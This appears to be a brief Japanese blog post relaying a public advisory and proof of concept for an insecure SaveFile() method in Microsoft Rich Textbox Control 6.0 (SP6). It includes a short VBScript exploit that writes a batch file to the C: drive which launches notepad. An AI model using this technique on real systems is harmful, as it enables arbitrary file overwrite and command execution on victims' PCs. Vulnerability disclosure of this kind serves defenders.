Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method
Microsoft Rich Textbox Control 6.0 (SP6)経由で任意のコマンドが実行可能とのこと。
ってか、このPoCというかExploit何でも動くやん・・・
While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}works fine so it is possible, using the "SaveFile()" method,
to save the content of the rich textbox on a user's pc.
This can be used to save, overwrite and/or corrupt arbitrary
files on the system.
<script language='vbscript'> Sub tryMe test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause" test.SaveFile "C:\shinnai.bat", 1 MsgBox "Exploit completed!" End Sub </script>